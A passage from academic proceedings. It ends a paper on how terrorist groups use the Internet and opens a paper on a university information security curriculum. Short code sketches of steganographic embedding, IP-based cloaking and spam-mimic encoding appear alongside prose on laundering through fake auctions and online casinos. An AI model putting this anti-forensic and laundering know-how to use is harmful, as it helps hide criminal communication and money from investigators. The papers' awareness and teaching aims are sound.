chemistry, engineering or weapons development can be identified and encouraged to join the group.<br />

This type of information can be derived from interactions in social networking sites, forums and blogs<br />

where users share information about their interests, beliefs, skills and careers. Online gaming sites<br />

also provide a source of potential members. For example, terrorist groups identify online players with<br />

a strong shooting ability that might be indicative of violent tendencies. In some terrorist groups, this<br />

type of temperament would be ideal for operational missions.<br />

In addition to traditional social networking sites like Facebook and MySpace, Web 2.0 technologies<br />

evolved to customisable social networking sites. West and Latham (2010) state that social networking<br />

creation sites are an online extremist's dream - it is inexpensive, easy-to-use, highly customisable and<br />

263


Namosha Veerasamy and Marthie Grobler<br />

conducive to online extremism. Ning users, for example, can create an individualised site where users<br />

have the ability to upload audio and video files, post and receive messages and blog entries, create<br />

events and receive RSS feeds. If a terrorist group sets up a customised social site, they would have<br />

the ability to control access to members, post propaganda videos and even use the site for<br />

fundraising.<br />

Another way of promoting a cause is with music (Whelpton 2009). Islamic and white supremacist groups<br />

perform captivating songs with pop and hip-hop beats that often attract young, impressionable teenagers.<br />

The lyrics of the music promote the cause and the catchy beats keep the youth captivated.<br />

Other examples of social networking include chat rooms, bulletin boards, discussion groups and micro<br />

blogging (such as Twitter). The type of social networking used by terrorist groups depends on the<br />

group’s infrastructure, ability and personal preference. For example, al Qaeda operatives use the<br />

Internet in public places and communicate by using free web based email accounts. For these public<br />

types of communication, instructions are often delivered electronically through code, usually in<br />

difficult-to-decipher dialects for which Western intelligence and security services have few or no<br />

trained linguists (Nordeste, Carment 2006).<br />

3.3 Anti-forensics<br />

Anti-forensics is a set of tools or methods used to counter the use of forensic tools and methods.<br />

Some of the identified types of anti-forensic measures include steganography, dead dropping,<br />

encryption, IP-based cloaking, proxies and anonymising. Since anti-forensic measures mostly offer<br />

targeted uni-directional communication, they are ideal for training, operations and communication within<br />

terrorist groups.<br />

Steganography is a method of covertly hiding one message within another. This is done by embedding<br />

the true message within a seemingly innocuous communication, such as text, image or audio. Only<br />

individuals who know of the hidden message and have the relevant key will be able to extract the<br />

original message from the carrier message. The password or passphrase is delivered to the intended<br />

recipient by secure alternative means (Lau 2003). Although it is difficult to detect the modified carrier<br />

media visually, it is possible to use statistical analysis. The February 2007 edition of Technical<br />

Mujahid contains an article that encourages extremists to download a copy of the encryption program<br />

“Secrets of the Mujahideen” from the Internet. The program hides data in the pixels of an image<br />
and compresses the file to defeat steganalysis attempts.<br />
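The pixel-level embedding described above can be illustrated with a minimal least-significant-bit (LSB) sketch. This is a generic demonstration of the technique over raw bytes, not the actual algorithm of the program mentioned in the article; the function names and byte-level carrier are assumptions made for the example.

```python
def embed(carrier: bytes, message: bytes) -> bytes:
    """Hide `message` in the least-significant bit of each carrier byte."""
    bits = [(byte >> i) & 1 for byte in message for i in range(8)]
    if len(bits) > len(carrier):
        raise ValueError("carrier too small for message")
    out = bytearray(carrier)
    for pos, bit in enumerate(bits):
        out[pos] = (out[pos] & 0xFE) | bit  # overwrite only the lowest bit
    return bytes(out)


def extract(stego: bytes, length: int) -> bytes:
    """Recover `length` hidden bytes from the low bits of the stego data."""
    bits = [b & 1 for b in stego[: length * 8]]
    return bytes(
        sum(bits[i * 8 + j] << j for j in range(8)) for i in range(length)
    )
```

Because only the lowest bit of each carrier byte changes, the modified carrier is visually indistinguishable from the original, which is exactly why detection falls back on the statistical analysis mentioned above.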

Another technique that would bypass messaging interception techniques is the use of virtual dead<br />

dropping, or draft message folders. Bruce Hoffman of the RAND Corporation (in Noguchi and Goo 2006) states<br />
that terrorists create free web-based email accounts and allow others to log into the accounts and<br />
read the drafts without the messages ever being sent. The email account name and password are<br />
transmitted in code in a chat forum or secure message board to the intended recipients. This<br />
technique is used especially for highly sensitive information (Nordeste, Carment 2006) and where<br />
electronic interception legislation may come into play.<br />

Redirecting traffic through IP-based cloaking is another anti-forensic technique. At a seminar at<br />
FOSE 2006, Cottrell (in Carr 2007) stated: “When the Web server receives a page request, a<br />

script checks the IP address of the user against a list of known government IP addresses. If a match<br />

is found, the server delivers a Web page with fake information. If no match is found, the requesting<br />

user is sent to a Web page with real information”. Hence the expression ‘cloaking’, as the authentic<br />
site is masked. This leads to a similar technique, IP-based blocking, which prevents users’<br />

access to a site instead of redirecting the traffic.<br />
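The server-side check Cottrell describes can be sketched roughly as follows. The watched network range (a reserved documentation block) and the page names are hypothetical placeholders; a real cloaking script would consult a much larger database of address blocks attributed to government agencies.

```python
import ipaddress

# Hypothetical watch list for illustration only (TEST-NET-1).
WATCHED_NETS = [ipaddress.ip_network("192.0.2.0/24")]


def select_page(client_ip: str) -> str:
    """Serve a decoy page to watched addresses, the real page otherwise."""
    addr = ipaddress.ip_address(client_ip)
    if any(addr in net for net in WATCHED_NETS):
        return "decoy.html"  # fake information for flagged visitors
    return "real.html"       # authentic content for everyone else
```

IP-based blocking differs only in the first branch: instead of returning a decoy page, the server refuses the request outright.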

Other techniques include the use of a proxy and secure channel to hide Internet activity. The Search<br />

for International Terrorist Entities Institute (SITE) detected a posting that encouraged the use of a<br />

proxy as it erases digital footprints such as web addresses and other identifiable information (Noguchi,<br />

Goo 2006). The premise of this approach is that the user connects to a proxy that requests an<br />

anonymising site to redirect the user to the target site. The connection to the proxy is via a secure<br />

encrypted channel that hides the originating user’s details. The well-known cyber user Irhabi 007<br />

(Terrorist 007) also provided security tips by distributing anonymising software that masks an IP<br />

address (Labi 2006).<br />




Another innovative use of the Internet is provided by spammimic.com. Spam (unsolicited distribution<br />

of mass email communication) has become a nuisance for the average netizen. Most people<br />
automatically delete these messages or send them to the spam folder. Spammimic.com provides an<br />

interesting analogue of encryption software that hides messages within the text of ordinary mail. It<br />

does not provide true encryption, but hides the text of a short message into what appears to be an<br />

average spam mail. Not only are the messages disguised, but few people will take the chance to<br />
open the email for fear of attached malware. Thus, only the intended recipients will know about the<br />
disguised messages and decode them through the web interface (Tibbetts 2002).<br />
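The spammimic idea can be sketched as a simple mimic encoding in which each bit of the hidden message chooses between two interchangeable spam phrases. The phrase table and separator below are invented for illustration and bear no relation to spammimic.com's actual grammar.

```python
# Each message bit selects one of two spam-sounding phrases.
# The table is a made-up example; a real mimic grammar is far richer.
PHRASES = [
    ("Dear Friend", "Dear Colleague"),
    ("act now", "respond today"),
    ("limited offer", "exclusive deal"),
    ("100% free", "at no cost"),
]


def encode(bits: list) -> str:
    """Render a bit sequence as innocuous-looking spam text."""
    return " ! ".join(PHRASES[i % len(PHRASES)][b] for i, b in enumerate(bits))


def decode(text: str) -> list:
    """Recover the bit sequence from the phrase choices."""
    return [
        PHRASES[i % len(PHRASES)].index(part)
        for i, part in enumerate(text.split(" ! "))
    ]
```

Note that no cryptography is involved: the security rests entirely on the message looking like junk mail that nobody bothers to read.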

3.4 Fundraising<br />

Fundraising is the process of soliciting and gathering contributions by requesting donations, often in<br />

the form of money. Some of the identified types of fundraising methods include donations,<br />

auctioneering, casinos, credit card theft, drug trafficking and phishing. Since fundraising methods<br />

mostly offer targeted communication, they can be used for operations and funding activities.<br />

Since the 9/11 terrorist attack, terrorist groups have increasingly relied on the Internet for finance<br />

related activities. Popular terrorist organisation websites often have links such as “What You Can Do”<br />

or “How Can I Help”. Terrorist websites publish requests for funds by appealing to sympathetic users<br />

to make donations and contribute to the funding of activities. Visitors to such websites are monitored<br />

and researched. Repeat visitors or individuals spending extended periods on the websites are<br />

contacted (Piper 2008). These individuals are guided to secret chat rooms or instructed to download<br />

specific software that enables users to communicate on the Internet without being monitored<br />

(Nordeste, Carment 2006).<br />

However, malicious or disguised methods of fundraising are also possible. Electronic money transfer,<br />

laundering and generating support through front organisations are all fundraising methods used by<br />

terrorists (Goodman, Kirk & Kirk 2007). According to the Financial Action Task Force, “the misuse of<br />

nonprofit organizations for the financing of terrorism is coming to be recognized as a crucial weak<br />

point in the global struggle to stop such funding at its source” (Jacobson 2009). Examples of such<br />

undertakings include Mercy International, Rabita Trust, Global Relief Fund, and Help the Needy<br />

(Conway 2006). Some charities are founded with the express purpose of financing terror, while others<br />

are existing entities that are infiltrated by terrorist supporters from within (Jacobson 2009).<br />

Other methods related to fundraising include online auctioneering to move money around. This<br />

involves two partners, known as smurfs, who arrange a fake transaction. One partner bids on an item<br />

and pays the auction amount to the auction house. The other partner receives payment for the fake<br />

auction item. There are also scams where users bid on their own items in an effort to store money and<br />

prevent detection (Whelpton 2009). In one specific auction, a set of second-hand video games was<br />
offered for $200, whilst the same set could be purchased brand new from the publisher for $39.99<br />
(Tibbetts 2002). Although the ludicrously high selling price is not illegal, such an item will only attract<br />
the attention of a selected, trusted agent. This allows terrorist groups to move money around without<br />

actually delivering the auctioned goods or services.<br />

Online casinos can be used for both laundering and storing money. When dealing with large sums of<br />

money, terrorists can place them in an online gambling site. Small bets are made to ensure activity, while<br />

the rest of the money is safely stored and hidden (Whelpton 2009). Alternatively, any winnings can be<br />

cashed in and transferred electronically to bank accounts specifically created for this purpose<br />

(Jacobson 2009).<br />

Stolen credit cards can help to fund many terrorist activities. For example, Irhabi 007 and his<br />

accomplice accumulated 37 000 stolen credit card numbers, making more than $3.5 million in charges<br />

(Jacobson 2009). In 2005, stolen credit card details were used to purchase domain space with a<br />

request stemming from Paris. When a similar request for nearby domain space was made shortly<br />
after the initial one, under another name in Britain, it was detected as fraud and the backup files<br />
of the initial site were investigated. Although the files were mostly in Arabic, the video footage included<br />
insurgent forces clashing with American forces, depicting the Iraqi conflict from the attackers’ point of view<br />

(Labi 2006).<br />

Drug trafficking is considered a large income source for terrorist groups. Fake Internet drugs are<br />

trafficked, containing harmful ingredients such as arsenic, boric acid, leaded road paint, polish, talcum<br />




powder, chalk and brick dust. In an elaborate scheme, Americans were tricked into believing they were<br />
buying Viagra, but instead received fake drugs. The money paid for these drugs is used to fund<br />
Middle Eastern terrorism. The UK Medicines and Healthcare products Regulatory Agency reports that up to 62%<br />
of the prescription medicine on sale on the Internet without requiring a prescription is fake<br />

(Whelpton 2009).<br />

3.5 Other examples of the exploitation of the ICT infrastructure<br />

Kovner (in Lachow and Richardson 2007) discusses one of al Qaeda’s goals of using the Internet to<br />

create resistance blockades to prevent Western ideas from corrupting Islamic institutions. In some<br />

instances, Internet browsers designed to filter out content from undesirable Western sources were<br />

distributed without users being aware of it. Brachman (2006) also discusses jihadi computer programmers<br />
launching browsing software, similar to Internet Explorer, that searches only particular sites and thus<br />
restricts the freedom to navigate to certain online destinations.<br />

Another technique from the infamous terrorist Irhabi 007 was to exploit vulnerabilities in FTP servers,<br />

reducing risk from exposure and saving money. Irhabi dumped files (with videos of Bin Laden and<br />
9/11 hijackers) onto an FTP server at the Arkansas State Highway and Transportation Department and<br />

then posted links warning users of the limited window of opportunity to download (Labi 2006).<br />

SITE (in Brachman 2006) discovered a guide for jihadis to use the Internet safely and anonymously.<br />

This guide explains how governments identify users, penetrate their usage of software chat programs<br />
(including Microsoft Messenger and Paltalk), and advises readers not to use Saudi Arabian based<br />
email addresses (ending with .sa) due to their insecure nature. Readers are advised instead to register<br />
anonymous accounts with commercial providers like Hotmail or Yahoo!.<br />

Cottrell (in Dizard 2006) discusses the following emerging cloaking trends:<br />

Terrorist organisations host bogus websites that mask their covert information or provide<br />

misleading information to users they identify as federal employees or agents;<br />

Criminal and terrorist organisations are increasingly blocking all traffic from North America or from<br />

IP addresses that point back to users who rely on the English language;<br />

Another cloaking practice is the provision of fake passwords at covert meetings. When one of the<br />

fake passwords is detected, the user is flagged as a potential federal intelligence agent who has<br />

attended the meetings, which in turn makes them vulnerable to being kidnapped or becoming the<br />

unwitting carriers of false information; and<br />

Another method was used in a case in which hackers set a number of criteria that they all shared,<br />
such as using the Linux operating system and the Netscape browser. When federal<br />

investigators using computers running Windows and using Internet Explorer visited the hackers'<br />

shared site, the hackers' system immediately mounted a distributed denial-of-service attack<br />

against the federal system.<br />

Sometimes communication between terrorists occurs through a special code developed by the group<br />

itself. By using inconspicuous words and phrases, it is possible to deliver these messages in a public<br />

forum without attracting untoward attention. For example, Mohammed Atta’s final message to the<br />

other eighteen terrorists who carried out the attacks of 9/11 is reported to have read: “The semester<br />

begins in three more weeks. We’ve obtained 19 confirmations for studies in the faculty of law, the<br />

faculty of urban planning, the faculty of fine arts, and the faculty of engineering.” The reference to the<br />

various faculties is code for the buildings targeted in the attacks (Weimann 2005).<br />

Defacing websites is a popular way for terrorist groups to demonstrate their technical capability and<br />

create fear. These defacements often take the form of public alterations of a website that are visible to<br />

a large audience. An example of such an attack took place in 2001, when a group known as the<br />

Pentaguard defaced a multitude of government and military websites in the UK, Australia, and the<br />

United States. “This attack was later evaluated as one of the largest, most systematic defacements of<br />

worldwide government servers on the Web”. Other examples include pro-Palestinian hackers using a<br />
coordinated attack to break into and deface 80 Israel-related sites, and al Qaeda<br />
depositing images of the murdered Paul Marshall Johnson, Jr. on the hacked website of the Silicon<br />

Valley Landsurveying, Inc (Brunst 2010).<br />



4. Conclusion<br />


The use of the Internet by terrorist groups has expanded to both traditional Internet usage and the<br />

more innovative usage of both traditional and new Internet functions. Global terrorist groups can now<br />

electronically target an enormous number of potential recipients, recruits and enemies. Terrorist<br />
groups often embrace the opportunities that technological innovation brings in order to advance<br />
their own operations.<br />

This paper is informative in nature, aiming to make the public aware of the potential that ICT<br />

infrastructure has in assisting terrorist groups in their operations and normal functions. These<br />

functions include all the processes from recruitment and training of new members, communicating<br />

with existing members, planning and executing operations, distributing propaganda, fundraising and<br />

carrying out psychological warfare. Due to the unique nature of the Internet, many of these traditional<br />

and innovative Internet uses can be carried out in either a uni-directional or bi-directional fashion,<br />

depending on the nature of the communication required.<br />

Based on this research, it can be seen that international terrorist groups can use the Internet in most<br />
of their daily functions to facilitate the growth and operation of the groups. In a sense, terrorist groups<br />
can actively exploit the existing ICT infrastructure to advance their causes. This paper discussed<br />
specific instances and provided examples of this exploitation through web literature use, social<br />
networking tools, anti-forensic techniques and novel fundraising methods. In conclusion, further<br />
research may be done to identify ways in which these innovative uses of the Internet can be turned to<br />
counter terrorist attacks, and not only support terrorist activities.<br />

References<br />

Atwan, A. (2006), The secret history of al Qaeda, 1st edn, University of California Press, California.<br />

Bass, R. & Ho, S.M. (2007), AP: 1M archived pages removed post-9/11.<br />

Brachman, J.M. (2006), "High-tech terror: Al-Qaeda's use of new technology", Fletcher Forum of World Affairs,<br />

vol. 30, pp. 149.<br />

Brunst, P.W. (2010), "Terrorism and the Internet: New Threats Posed by Cyberterrorism and Terrorist Use of the<br />

Internet" in A War on Terror?, ed. P.W. Brunst, Springer, pp. 51-78.<br />

Carr, J. (2007), Anti-Forensic Methods Used by Jihadist Web Sites.<br />

Coll, S. & Glasser, S.B. (2005), "Terrorists turn to the Web as base of operations", The Washington Post, vol. 7,<br />

pp. 77–87.<br />

Conway, M. (2006), "Terrorist 'Use' of the Internet and Fighting Back", Information and Security, vol. 19, pp. 9.<br />

Dizard, W.P. (2006), Internet "cloaking" emerges as new Web security threat, Government Computer News.<br />

Goodman, S.E., Kirk, J.C. & Kirk, M.H. (2007), "Cyberspace as a medium for terrorists", Technological<br />

Forecasting and Social Change, vol. 74, no. 2, pp. 193-210.<br />

Internet World Stats (2010), last updated May 27, 2010, Internet usage statistics - The internet big picture: World<br />
internet users and population stats. Available: http://www.internetworldstats.com/stats.htm [2010, 06/08].<br />

Jacobson, M. (2009), "Terrorist financing on the internet", CTC Sentinel, vol. 2, no. 6, pp. 17-20.<br />

Jamestown Foundation, (2006), Next Stage in Counter-Terrorism: Jihadi Radicalization on the Web.<br />

Kimmage, D. & Ridolfo, K. (2007), "Iraqi Insurgent Media. The War of Images and Ideas. How Sunni Insurgents<br />

in Iraq and Their Supporters Worldwide are Using the Media", Washington, Radio Free Europe/Radio<br />

Liberty.<br />

Labi, N. (2006), "Jihad 2.0", The Atlantic Monthly, vol. 102.<br />

Lachow, I. & Richardson, C. (2007), "Terrorist use of the Internet: The real story", Joint Force Quarterly, vol. 45,<br />

pp. 100.<br />

Lau, S. (2003), "An analysis of terrorist groups' potential use of electronic steganography", Bethesda, Md.:<br />
SANS Institute, February, pp. 1-13.<br />

Noguchi, Y. & Goo, S. (2006), Terrorists’ Web Chatter Shows Concern About Internet Privacy, Wash.<br />

Nordeste, B. & Carment, D. (2006), " Trends in terrorism series: A framework for understanding terrorist use of<br />

the internet ", ITAC, vol. 2006-2, pp. 1-21.<br />

Piper, P. (2008), Nets of terror: Terrorist activity on the internet. Searcher, vol.16, issue 10.<br />

Tibbetts, P.S. (2002), "Terrorist Use of the Internet and Related Information Technologies", Army Command And<br />

General Staff Coll Fort Leavenworth Ks School Of Advanced Military Studies, pp. 1-67.<br />

Weimann, G. (2009), "Virtual Terrorism: How Modern Terrorists Use the Internet", Annual Meeting of the<br />

International Communication Association, Dresden International Congress Centre, Dresden.<br />

Weimann, G. (2005), "How modern terrorism uses the internet", The Journal of International Security Affairs, vol.<br />

Spring 2005, no. 8.<br />

West, D. & Latham, C. (2010), "The Extremist Edition of Social Networking: The Inevitable Marriage of Cyber<br />
Jihad and Web 2.0", Proceedings of the 5th International Conference on Information Warfare and Security,<br />
ed. L. Armistead, Academic Conferences.<br />

Whelpton, J. (2009), "Psychology of Cyber Terrorism" in Cyberterrorism 2009 Seminar Ekwinox, South Africa.<br />



Evolving an Information Security Curriculum: New<br />

Content, Innovative Pedagogy and Flexible Delivery<br />

Formats<br />

Tanya Zlateva, Virginia Greiman, Lou Chitkushev and Kip Becker<br />

Boston University, USA<br />

zlateva@bu.edu<br />

ggreiman@bu.edu<br />

ltc@bu.edu<br />

kbecker@bu.edu<br />

Abstract: In the last ten years information security has been recognized as a most relevant new trend by<br />

academia, government and industry. The need for educating information security professionals has increased<br />

dramatically and is not being met despite recent growth of cyber security programs. The challenge of designing<br />
and evolving multi-disciplinary curricula that provide theoretical as well as hands-on experience and are also<br />
available to a broad student audience is of strategic importance for the future of reliable and secure systems. We<br />

present our experience in designing and evolving information security programs that have grown to over 650<br />

students per year since their inception eight years ago and have graduated more than 250 students. We discuss<br />

three major directions in the evolution of the program: the increased focus of the core and growth of<br />

concentration electives, the design of cyber law curriculum and coordination with the business continuity<br />

programs, and the introduction of new educational technologies such as virtualization and video-collaboration<br />

and flexible online and blended delivery formats. The rapid growth of the program, the changes in the discipline<br />

and the great diversity of professional interests of our students required broadening of the curriculum with<br />

courses and modules on emerging technologies such as digital forensics, biometrics, security policies and<br />

procedures, privacy and security in health care, cyber law, as well as the coordination of the curriculum with<br />

existing programs in business continuity. Special efforts were devoted to the introduction of more participatory<br />
pedagogy, more specifically by developing a series of virtual laboratories that brought real-world situations into<br />
the classroom and through video-collaboration tools that encourage team building. The accessibility of the<br />
programs was increased through the introduction of flexible delivery formats. After establishing the programs in<br />
the traditional classroom, we added a blended and online version that rapidly found a national audience.<br />

Keywords: information security education, digital forensics, cyber law, virtualization, business continuity, online<br />

and blended learning<br />

1. Introduction<br />

The strong and steadily increasing reliance on a globally distributed computational infrastructure in<br />

virtually all areas of human endeavor—business, industry, government, defense, health care, and<br />
even the individual’s social interactions—has made security and reliability of vital importance and has<br />
sharply increased the need for information security professionals. This need is not being met despite<br />
the recent growth of cyber security programs. The reasons lie in the complexity of the task, which<br />
requires building an interdisciplinary curriculum that integrates knowledge domains as diverse as<br />
cryptography, ethics, engineering, management and law. An additional challenge is the unusually<br />
large gap between theory (e.g. cryptographic algorithms) and practical skills (e.g. setting up a<br />
firewall), which calls for an imaginative and effective way to bring real-world experience into the classroom.<br />

This paper presents and discusses our experience in establishing and growing the information<br />

security concentrations in the Master’s programs in Computer Science, Computer Information<br />

Systems, and Telecommunication at Boston University that are offered through BU’s Metropolitan<br />

College. The programs are certified by the Committee on National Security Systems. Since the<br />

introduction of the security curriculum in 2002 enrollments in our security courses grew to over 650<br />

per year and more than 250 students have completed their Master’s degree with a concentration in<br />

security. We trace the evolution of the programs in three major directions: the broadening and<br />

diversification of the curriculum, developing a cyber law course and coordinating the curriculum with<br />

programs in business continuity, and introducing new educational technologies (more specifically<br />
virtualization and video-collaboration) and flexible online and blended delivery formats.<br />

2. Design principles, structure, and initial curriculum<br />

We started introducing information security themes in the curriculum in the late 1990s and formally<br />

introduced an information security concentration in the Master’s programs of Computer Science,<br />



Tanya Zlateva et al.<br />

Computer Information Systems and Telecommunication in 2002. The central goal of the program was<br />

to draw upon the resources of a large research university and to give students the academic<br />

knowledge and technical skills as well as to develop their ability to identify and solve security<br />

problems in their multi-disciplinary complexity taking into account technical, managerial, legal, and<br />

ethical aspects of information security. We emphasized from the outset an interdisciplinary design<br />

approach with strong laboratory and experiential components; a program scope that embraces<br />

contributions from multiple fields; and a program structure that integrates information assurance<br />

concepts, topics, and methods throughout the curriculum as opposed to predominantly in specialized<br />

courses (Zlateva et al., 2003). The integration of information assurance topics across the curriculum is<br />

conducted at three levels (Table 1):<br />

First, the fundamental information assurance topics are taught within the existing core courses at<br />

the undergraduate and graduate level. This ensures that all students are equipped with the basic<br />

knowledge of information security that is currently indispensable for any professional working in<br />

computer software, hardware, systems, or networks.<br />

Second, specialized semester long courses—such as information security, network security,<br />

database security, cryptography, biometrics, digital forensics, etc. —provide in-depth analysis of<br />

different security aspects. These courses provide the core for concentrators in information<br />

security and are available as electives to students outside the information security concentration.<br />

Third, advanced specialized courses—such as web applications, web services, enterprise<br />

computing, mobile applications, data mining etc. —include cyber security topics and modules.<br />

Our Master’s programs consist of ten four-credit courses, and a concentration requires the<br />
completion of four courses, typically three specialized courses that provide depth and one related high-level<br />

elective for breadth. When first introduced in 2002 the security concentrations in the MS in CS, CIS,<br />

and TC were based on five specialized courses— cryptography, computer networks and security,<br />

information systems security, database security, and network management and computer security<br />

(Table 1).<br />

The programs were well received and grew rapidly. From a curriculum point of view we soon<br />

recognized two related trends, both of which required the introduction of new security topics and<br />

further development of the curriculum both in depth and breadth. From the point of view of pedagogy<br />

and access, it became clear that novel online technologies such as virtualization and video-collaboration<br />

can increase the impact of content presentation and that new delivery formats, such as<br />

hybrid or distance learning, can make the program available to students at remote locations or who<br />

are unable to attend on-campus classes due to demanding work schedules. In the following we first<br />

discuss the evolution of the curriculum and then the novel teaching approaches.<br />

The large majority of students in our programs are information technology professionals and a<br />

considerable number are already involved in information security. From the very beginning of the<br />

programs their interests ranged from biometrics to digital forensics on the technical side, and from<br />

security policies to legal and regulatory issues on the managerial and organizational side. At the same<br />

time the information security field was rapidly evolving, maturing, and its importance was becoming<br />

widely recognized. Both these factors required us to deepen the theoretical and applied knowledge of<br />

the core, to update and broaden the curriculum with topics and/or courses on emerging<br />

technologies, and to seek synergies with programs that focus on related and complementary fields.<br />

Depth was achieved by restructuring the teaching of security fundamentals and adding a course on<br />

network security in recognition of the central importance that global networks play in the modern<br />

world. Breadth was achieved by introducing a four-course certificate in digital forensics, a new course<br />

in biometrics and a number of specialized content modules in the advanced courses. In collaboration<br />

with the administrative sciences department we are currently exploring synergies with the<br />

concentration in Business Continuity, Security, and Risk Management and the introduction of a new<br />

course on cyber law.<br />




Table 1: Structure and evolution of the security curriculum (in the middle box, the initial<br />
concentration courses are on the right and the new courses on the left; courses that are<br />
currently offered are in italics)<br />

Information security modules in core undergraduate and graduate courses<br />
(intro programming and data structures, operating systems, data communications and networks,<br />
databases, algorithms, software engineering)<br />

Information Security Concentration Courses<br />
New courses: Enterprise Information Security (CS695); Network Security (CS690); IT Security<br />
Policies and Procedures (CS684)<br />
Initial courses: Computer and Network Security (CS654); Information Systems Security (CS684);<br />
Database Security (CS674); Cryptography (CS786); Network Management and Computer<br />
Security (TC685)<br />

Electives: Advanced Cryptography (CS799); Biometrics (CS599); Digital Forensics and<br />
Investigations (CS693); Network Forensics (CS703); Advanced Digital Forensics (CS713);<br />
Network Performance and Management (CS685)<br />

Information security modules in high-level courses (web application development, web services,<br />
enterprise computing, mobile applications, data mining, biomedical information technology,<br />
electronic health records)<br />

3. Evolving the information security curriculum<br />

3.1 Focusing and expanding the concentration courses<br />

Initially we provided the security fundamentals in a single course that came in two flavors—a<br />

Computer and Network Security course for the MS in CS and CIS programs and a Network<br />

Management and Computer Security course tailored to the needs of the telecommunication program.<br />

Two years into the program this structure became insufficient for accommodating the growing body of<br />

knowledge in security models and protocols and especially in network security. We restructured the<br />

curriculum by consolidating enterprise security topics into a single course required for all<br />

concentrations and dedicating a full course to network security. The Network Management and<br />
Computer Security course of the telecommunication degree was revised into a Network Performance<br />
and Management course, which retained an emphasis on security and was moved into the core. (Table 1<br />
shows the evolution of the curriculum; the program and course descriptions are available at the<br />
web site of Boston University (2010a).)<br />

The new Enterprise Information Security course lays a solid academic basis for the understanding of<br />

security issues in computer systems, networks, and applications. It discusses formal security models<br />

and their application in operating systems; application-level security with a focus on language-level<br />




security and various security policies; an introduction to conventional and public-key encryption,<br />

authentication, message digests and digital signatures, and an overview of Internet and intranet topics.<br />

The Network Security course expands on the fundamentals (security services, access controls,<br />

vulnerabilities, threats and risk, network architectures and attacks) through a discussion on network<br />

security capabilities and mechanisms (access control on wire-line and wireless networks), IPsec,<br />

firewalls, deep packet inspection and transport security. It then addresses network application security<br />

(email, ad-hoc, XML/SAML and Service-Oriented Architecture security).<br />
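The rule-based access-control idea behind the firewall material above can be illustrated with a toy first-match packet filter. The sketch below is our own hypothetical simplification, not the course's actual lab content; all rules and port numbers are invented.<br />

```python
# A toy first-match-wins packet filter, illustrating the rule-based idea
# behind firewall access control. Rules, ports and the single match
# criterion (destination port) are hypothetical simplifications.
from dataclasses import dataclass
from typing import List, Optional

@dataclass
class Rule:
    action: str                      # "allow" or "deny"
    dst_port: Optional[int] = None   # None matches any destination port

def filter_packet(rules: List[Rule], dst_port: int) -> str:
    """Return the action of the first matching rule; default-deny otherwise."""
    for rule in rules:
        if rule.dst_port is None or rule.dst_port == dst_port:
            return rule.action
    return "deny"

# Allow HTTPS and SSH; the final catch-all rule denies everything else.
rules = [Rule("allow", 443), Rule("allow", 22), Rule("deny")]
print(filter_packet(rules, 443))  # allow
print(filter_packet(rules, 23))   # deny
```

Real firewalls match on many more fields (source address, protocol, state), but the first-match, default-deny structure is the same.<br />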

A new course on IT Security Policies and Procedures evolved from and replaced the Information<br />

System Security course by shifting the focus to methodologies for identifying, quantifying, mitigating<br />

and controlling security risks, the development of IT risk management plans, standards, and<br />

procedures that identify alternate sites for processing mission-critical applications, and techniques to<br />

recover infrastructure, systems, networks, data and user access.<br />
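The risk-quantification methodologies the course covers can be illustrated with the classic single/annualised loss expectancy calculation; the sketch below and all of its figures are our own illustrative example, not course material.<br />

```python
# Classic quantitative risk metrics: SLE = asset value x exposure factor,
# ALE = SLE x annual rate of occurrence. All figures are hypothetical.

def single_loss_expectancy(asset_value: float, exposure_factor: float) -> float:
    """Expected loss from a single incident."""
    return asset_value * exposure_factor

def annualised_loss_expectancy(sle: float, annual_rate_of_occurrence: float) -> float:
    """Expected loss per year."""
    return sle * annual_rate_of_occurrence

# Hypothetical asset worth $500,000, 40% damaged per breach,
# one breach expected every two years (ARO = 0.5).
sle = single_loss_expectancy(500_000, 0.40)
ale = annualised_loss_expectancy(sle, 0.5)
print(f"SLE = ${sle:,.0f}, ALE = ${ale:,.0f}")  # SLE = $200,000, ALE = $100,000
```

An ALE of this kind gives a ceiling on what it is rational to spend annually on a mitigating control, which is how such figures feed into the risk management plans the course develops.<br />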

3.2 Adding security electives<br />

Elective courses on specialized security topics were added based on student interests and emerging<br />

technologies. In response to an early and sustained interest in digital forensics we developed first a<br />

course and then a Graduate Certificate in Digital Forensics (Boston University 2010a) that can be<br />

taken as a stand-alone or as part of the MS degree. The certificate consists of a required Business<br />

Data and Communication Network course and three forensics courses that build on each other:<br />

Digital Forensics and Investigations (CS693) introduces the investigative process, available<br />

hardware and software tools, digital evidence controls, data acquisition, computer forensic<br />

analysis, e-mail investigations, image file recovery, investigative report writing, and expert witness<br />

requirements.<br />

Network Forensics (CS703) explores the relationship between network forensic analysis and<br />

network security technologies, identification of network security incidents and potential sources of<br />

digital evidence, basic network data acquisition and analysis.<br />

Advanced Digital Forensics (CS713) discusses malicious software, reverse engineering<br />

techniques for conducting static and dynamic forensic analysis on computer systems and<br />

networks, legal considerations, digital evidence controls, and documentation of forensic<br />

procedures.<br />

A Biometrics (CS599) course was developed in response to the increased significance of biometric<br />

approaches and their integration into traditional security schemes. The course presents fundamental<br />

methods for designing applications based on various biometrics (fingerprints, voice, face, hand<br />

geometry, palm print, iris, retina), multimodal approaches, privacy aspects of using<br />

biometric data, and system performance issues.<br />

Based on industry demand from high-tech Boston area companies we developed an Advanced<br />

Cryptography (CS713) elective course that expanded the coverage of cryptographic algorithms to<br />

include elliptic curves, block ciphers, the data encryption standard (DES) and double and triple DES,<br />

the advanced encryption standard (AES), cryptographic hash functions (SHA-512 and WHIRLPOOL),<br />

and key management issues.<br />
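Of the hash functions listed above, SHA-512 is available in Python's standard library (WHIRLPOOL is not); a minimal sketch of the fixed digest size and the avalanche effect, with inputs of our own choosing:<br />

```python
import hashlib

# SHA-512 produces a fixed 512-bit digest (128 hex characters)
# regardless of the input length.
d1 = hashlib.sha512(b"attack at dawn").hexdigest()
d2 = hashlib.sha512(b"attack at dusk").hexdigest()
assert len(d1) == len(d2) == 128

# Avalanche effect: a small change in the input yields a digest that
# shares essentially nothing with the original.
print(d1[:16])
print(d2[:16])
print(d1 != d2)
```
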

In addition to these new courses, we developed security modules in the high-level electives, including<br />

web application development, web services, enterprise computing, mobile applications, data mining,<br />

and most recently in the courses on biomedical information technology and electronic health records<br />

of our new concentration in Health Informatics.<br />

4. Relating technological aspects to cyber law and business continuity<br />

The importance of protecting information for achieving business success has always been recognized<br />

by the business community but it has reached a new dimension since cyberspace became the<br />

preferred medium for business transactions. Expenses for information security systems continue to<br />

grow and it has been found that quality of information security impacts the financial value of<br />

companies. According to McAfee (2006) United States companies spend as much on information<br />

